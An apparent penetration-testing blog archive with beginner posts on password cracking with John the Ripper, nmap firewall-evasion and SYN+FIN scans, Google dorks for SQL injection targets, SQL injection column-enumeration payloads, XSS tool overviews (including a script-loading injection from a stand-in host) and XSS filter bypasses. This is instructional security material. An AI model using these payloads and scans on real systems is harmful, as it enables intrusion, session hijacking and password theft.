Here are two great links about important skills for penetration testers:
Category Archives: Basics
John The Ripper Basics
Filed under Basics, Fu (a.k.a Tips), Tools
A friend was asking about password cracking. He needed an easy tool that also did mutations of passwords within his dictionary. Here is the cheat sheet I made for him to use John:
Basic:
$ john [target file]Wordlist:
$ john --wordlist=[dictionary file] [target file]
The following tags can be used to add extra functionality:
--rulesDoes permutation on the supplied wordlist
--stdoutthis combined with a pipe ( | ) can be used to feed a jtr mutated password list into another cracking program.
Those are the very basics to john, but that should be enough for a beginner.
Read all about John The Ripper here, and see more jtr command line options here
Bypassing Firewalls with SYN+FIN
Filed under Basics, Fu (a.k.a Tips), Uncategorized
There exists a vulnerability within many firewalls and other systems that permit a session to be established in spite of firewall rules. The specifics are outlined here
To briefly demonstrate this, I will craft custom TCP packets with the SYN and FIN flags set. I will use Nmap for my port scanning, and Nemisis for all others:
NMap
nmap -v -v --scanflags SYNFIN -P0 <target>
Nemesis
nemesis tcp -v -fS -fF -D <target> -S <myip>
In the case of Nmap, notice how the ports that were originally “filtered” are now “open”. Note, not all systems are vulnerable to this bypass. Sorry for not having a better demo. Go and try it out on your own and see how it works. enjoy!
Nmap vs. Firewalls: Stealth Scanning and Rule Enumeration
Filed under Basics, Fu (a.k.a Tips)
nmap is a basic tool used in any hack or penetration test. It stands of “network mapper”, and does exactly that. Nmap has evolved to be so much more than a port scanner. In a way, its like a packet building tool with a series of shortcuts and macros. As each attack progresses through it’s phases, eventually a port scan is done. One problem is remaining stealthy, and avoiding being blocked. In military terms, you should progress through the phases of Stealth-Speed-Violence of Action. Meaning, remain stealthy, if that is compromised, move faster, and if you get stopped, fight harder. In terms of security, Stealth should be your top priority in an attack. Unfortunately, most defenders are going to be on the lookup for signs of port scans, and basic techniques used by tools (including nmap). Fortunately, Nmap (props to Fyodor) has provided us with some options that allow us to dynamically alter our scanning packets in a way that may evade firewalls or detect their rules. This is not a complete list, but these are my favorites:
Evasion
- ACK Scan (-sA): By sending ACK packets instead of SYN packets, a stateless firewall/ids may not log the packet since it assumes the ACK is in response to a SYN.
- Fragment Packets (-f): Evades detection by making it difficult for the inspecting system to piece together the contents of the TCP packet. This is done by splitting the header into 3 sections (2 8-bit packets, and a 4-bit). This may cause some issues with any receiving services, so check it out first. You can specify -f -f (-f twice) to be a little safer. This will send a 16-bit packet, and then the remaining 4.
- Specify MTU (–mtu): Customizable fragmentation. Works the same way as -f, but you can specify the size of the packet. However, as stated in the documentation, “the offset must be a multiple of eight”. Note: Both –mtu and -f will not generally work on a firewall that uses queuing; so be aware of that.
- Source Port Spoofing (-g): Most firewalls will have certain ports that they will trust, ex. DNS and HTTP. Nmap allows you to spoof the port you scan from in certain situations. Although they are limited (port spoofing excludes connect, version, OS, script and some others scans) this is a pretty good option to have in situations where everything lines up correctly.
- Append Random Data (–data-length): This option works by appending a set amount of random data to the normal TCP (40-bits) or ICMP (28-bits) packet. It works by hoping that either 1) the filter expects port scans to be small and simple requests, or 2) the administrator wont think anything of it when they see it. I cant really attest to the accuracy of the second assumption.
- Randomize Hosts (–randomize-hosts): Causes nmap to scan a range of hosts in a random order. Less suspicious.
Enumeration:
- Send Bad Checksum (–badsum): This is another method to enumerate a firewall. Nmap will send bad checksums to the target. The target will drop these packets, but a firewall/ids may respond (RST packet, etc). Full details here.
- Set TTL (–ttl): This option can allow nmap to do a firewalk type of enumeration on a firewall.
You can read the entire nmap firewall/ids evasion documentation here. Thanks!
Using Google To Locate SQL Injection
Filed under Basics, Fu (a.k.a Tips), Web Hacking
SQL Injection is a powerful attack that exists today. It is found in web applications that interact with databases.
What Is SQL Injection?
The attack itself involves breaking out of the context of a developer defined SQL query and inserting your own logic in place. It is a result of inproper validation of user input, and programmer neglect of secure programming practices. If SQL Injection is completely new to you, I would recommend the following reading:
Discovery
There are a plethora of tools available to help you with SQL Injection. I will spare you the endless lists of tools, and show you the underlying techniques. First of all, let us discover some possible attack points. One of my favorite tools for this is Google! A query like the following can be used to find targets:
site:targetOfPentest.com inurl:"id=1"
In this example, we tell google to only search our target site (site:<testing target>), and for URLs that contain the string “id=1″ (inurl:”<search string literal>”). A note, Google excludes certain symbols like = and ? unless relevent. That is why i add the 1. It can really be anything you want. The reason this query works is simple. In many cases parameters for a specific request will contain actual ids reflecting the database. For instance, an id parameter may be used in a request to fetch its matching id from the server. Now, there is an underlying principle here that I had drilled into me by an Oracle ACE: NEVER reveal a primary key to the user. But back to the point, you see here that you can search for request parameters with names that may reflect their usage in the database. Here is a list I like:
- userid=
- index=
- form=
- username=
As another general rule, I look for parameters where the values are numbers, however in some cases strings are valuable.
There are also other types of google searches that are valuable. These take a little bit more searching testing, but they can give some great hits:
... inurl:login.(asp|php)[...]
In this case I am looking for certain pages that have specific functionality. I used the | seperated notation to indicate that I am looking for login.asp, and login.php pages. If you notice, the elipses (…)is in square brackets. This has to do with the request type. For example, in a GET request will include its parameters and values within the URL, whereas a POST request will hide the parameters in the message. So, if you include some extra logic, you will find examples of specific functioning pages which use GET requests. An example of this would be:
inurl:"login.(asp|php) inurl:"id=1"
For some reason, Google will pick up “login.asp?id=1″ (meaning, it will include the ? ). You can discovere different result sets byutilizing a closing double-quote on the first inurl statement, or removing them altogether. Play around with it.
What about POST requests?
Well, there are a few ways I like to deal with POST requests. Both are pretty simple. The manual way I use to see if the parameters are even semi-injectable is quite straight forward. Do the following:
- Open firebug, or use another debugger (Chrome’s Inspector, etc).
- Locate the form you want to test
- Literally change “POST”, to “GET”
- Submit the form with dummy data
Now look at the URL. It will have the parameters of the request included there. Now, when your actually testing for SQL injection, you dont want to rely on the replaying of this URL over and over. Instead you should use some sort of inline/local proxy. My favorite (because its easy) is TamperData, a firefox extension.
I think that is probably enough about simple discovery of SQL Injection targets with Google. I am sure there are more and better searches out there, please feel free to comment with your own favorites.
Stay tuned for more posts on SQL injection.
SQL Injection: Determining the number of columns
Filed under Basics, Fu (a.k.a Tips), Web Hacking
When you are performing error based SQL Injection it is important to be able to determine the number of columns in the table. There are generally two different ways you can go about this:
1) Order By:
http://www.vulnerablesite.me/lookup.php?id=1 ORDER BY n--
In this case, where n is any number greater than 0, we can determine the number of columns by trying different values. I usually increment the number by 2 until I get an error. I then decrease the number by one and try it again. If it returns no error, then that is the number of columns.
Once again, lets say that the following example (n = 7) yielded an error:
http://www.vulnerablesite.me/lookup.php?id=1 ORDER BY 7--
In this case, if the previous test (where n=6) did NOT yield an error, then I would be able to deduce that the number of columns is 6.
Note: the — is a comment. This is used to comment out any other clauses that might cause an error in the injected SQL (WHERE, original ORDER BY, etc).
2) UNION ALL
This method is a little more work, and is used for exploitation anyway. So its really your preference.
Lets say the target is the same as the last. So we know that the number of columns is 6. The following would NOT yield an error:
http://www.vulnerablesite.me/lookup.php?id=1 UNION ALL SELECT null,null,null,null,null,null [from dual] --
In this method, an error will be thrown if unioning any number of columns (or nulls) other than the correct number.
The from dual portion is necessary if attacking an Oracle database.
[Update] TCP/IP for Security Administrators
Filed under Basics, Fu (a.k.a Tips)
I had posted this a while back on the old blog. The old link had gone dead after a while, but a follow found the archive of it.
This video is a presentation about the TCP/IP stack specifically for Security personel. The old version was a stream, this is a download hosted by Akamai.
http://microsofttech.fr.edgesuite.net/msexp/download/0024/0024_hd.zip [unverified]
XSS – Exploitation beyond alert(‘xss’)
Filed under Basics, Fu (a.k.a Tips), Tools, Web Hacking
Cross-Site Scripting (as I had just recently discussed in a previous post) is a fairly simple attack to find and prove. However, actually making it do something useful is often elusive. The common vector is usually something like stealing cookies; session ids, etc.
In a penetration test, you would find it difficult to display criticality of a threat using a simple alert() box containing some text. Fortunately, there are a few tools out there that can help us demonstrate the danger of XSS. Most of these tools will cause exploitation via an injection similar to this:
<img src=”badurl.com/eviljs.js” />
- Browser Exploitation Framework (BEeF) – This amazing tool is my favorite stop for exploiting XSS beyond alert boxes. Essentially, when the victims browser executes the js file, it hooks into a php page that then allows a variety of attacks to be made. The attacker will see the attacked machine appear as a “zombie” and can do as they wish. The basics are included, as well as some metasploit interaction (i.e, Java Applet attack). From here it is simple to push a shell through, and achieve persistent exploitation of the target.
- Shell of the Future – This is another great tool for session hijacking via XSS. It works by using the HTML5 Cross Origin Request capability. When a user executes the payload, it then creates a connection to SotF’s web server (hosted on your machine). On the attacker end, SotF sets up a proxy that connects in with the server. So essentially, the attackers connection to your web server acts as a proxy for your browser. The attacker then browses to the SotF console, selects the victim, and can then browse using the victims session.
- Jikto – This tools received a lot of media attention when it was released. It was considered questionable about how any legitimate use of this tool was feasible . It works like this: When the victim executes the JS, it hooks them into botnet. From there the client can search, port scan, and exploits discovered XSS victims. The last I looked most of the source code was hidden away (or the mirrors were taken down).
- Others – there are others out there XSS Shell, etc. I wont go into details on those because they have simliar capabilities of those I listen above. If you have some of your favorites, please post a comment for others to look into.
I hope this was a little helpful.
Why we have a job…
Filed under Basics, Fu (a.k.a Tips), Web Hacking
I am often alarmed at some things some professors say, and even more so about things that they do.
For example. When programming in PHP it is more than easy to become susceptible to XSS and SQL Injection. For the uninformed, utilizing things like magic_quotes to prevent such attacks may seem simple enough. The following is a simple case-study:
<script>alert('XSS');</script> <---- Will Execute
the above code in any completely unfiltered use would cause an alert box to appear. To prevent this some developers figure, “well, if we can prevent them from using single quotes, then we can prevent that”. In their code they will then cause escaping of all single quotes to prevent the execution of any injected code. So for instance, instead of causing a pop-up, the following text would appear:
<script>alert(\'XSS\');</script> <----- Will NOT execute
Great…. for that one use case; but then not even…
Not to mention the numerous types of things you can do with XSS / SQL Injection without utilizing the single quote, there are simple way to bypass such “filtering”:
<script>alert(String.fromCharCode(88,83,83));</script>
<script>alert(/XSS/.source);</script>
Both of the above examples will cause the same exact pop-up as my first example. All without using single-quotes; nothing to be excited about at all. This example is virtually pointless, however, it proves a point.
The point is that as long as education personnel will teach insufficient filtering, as well as have these vulnerabilities on their own sites, we (the security professional) will have great job security (pun intended). I dont know if I should thank them, or be disgusted?
for more XSS bypasses, check out RSnakes cheat sheet here.
